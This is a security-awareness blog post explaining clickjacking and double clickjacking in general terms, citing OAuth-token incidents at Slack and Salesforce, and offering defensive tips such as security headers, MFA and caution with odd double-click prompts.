Introduction
You may have heard about clickjacking before…but what about DOUBLE clickjacking?
The same threat has evolved into a newer, more malicious form.
In a regular clickjacking attack, you’re tricked into clicking on a hidden or disguised element, like a button or link, which performs an unintended action. For example, the bad actor may overlay a transparent page over a legitimate website, making you believe that you’re clicking on a harmless and trusted link.
In a double clickjacking attack, the hacker tricks a user into double-clicking on a seemingly harmless prompt. The first click closes or changes the top window, and the second click lands on a sensitive element in the parent window. Remember — awareness is key against many cyber-threats!
How Double Clickjacking Works
This technique is particularly dangerous because it bypasses traditional clickjacking protections and can lead to account takeovers, unauthorized application permissions, and other security breaches. Here’s how it works.
- Initial Setup: The attacker creates a website with a button, which opens a new window displaying an innocent-looking prompt.
- Triggering the Exploit: When the user interacts with the compromised link, a new window launches and instructs you to double-click somewhere on the landing page. As it loads, an invisible webpage surreptitiously replaces the original content. A form that encourages you to input PII.
- Executing the Attack: The first click closes or changes the top window, and the second click lands on the sensitive element in the parent window, unknowingly authorizing malicious actions.
OAuth tokens grant applications access to a user’s data without sharing their credentials. Access tokens allow API requests, while refresh tokens help maintain sessions by obtaining new access tokens when needed.
Real Life Incidents
Consider one such attack that recently threatened Slack, involving OAuth tokens. Threat actors gained access to the company’s GitHub repositories by using stolen employee tokens. That allowed them to download private code repositories, although there was no evidence that customer data was compromised.
Attackers also targeted Salesforce accounts recently, going after the sensitive data they contain. One notable case involved the hacking group ‘0ktapus,’ who attacked technology and gaming companies, including Salesforce. They exploited misconfigurations in Salesforce communities to access sensitive data, and even take over user accounts.
Protect API keys and OAuth tokens as rigorously as passwords, so as to best prevent unauthorized access to all of your accounts!
Case studies like these exemplify why we need to heed our robust security measures, including multi-factor authentication and automatic monitoring for user activity.
How Can You Stay Safe?
By staying informed and cautious, you can protect yourself from these sophisticated attacks.
- Use Security Headers: Implement security headers like
X-Frame-OptionsandContent Security Policy (CSP)to prevent your site from being embedded in iframes on other sites. This can help mitigate clickjacking attempts! - Enable Clickjacking Protection in Web Applications: If you’re a developer, ensure that your web applications have built-in clickjacking protection. Many modern web frameworks offer this feature.
- Smart Browser Extensions: Use browsers with additional security features, like those that can block malicious scripts and frames. Remember to keep your browser and all plugins up to date. Browser developers continually improve security features to protect against new threats!
- Use Multi-Factor Authentication (MFA): Enable MFA on your accounts whenever possible. This adds an extra layer of security, making it harder for attackers to gain access even if they manage to hijack your clicks.
- Be Wary of Unusual Requests: Use caution when websites ask you to double-click on something, especially if it seems out of the ordinary. This could be a sign of a double clickjacking attempt.
Stay informed and stay safe online!
The post Double Clickjacking, Toil and Trouble! appeared first on .
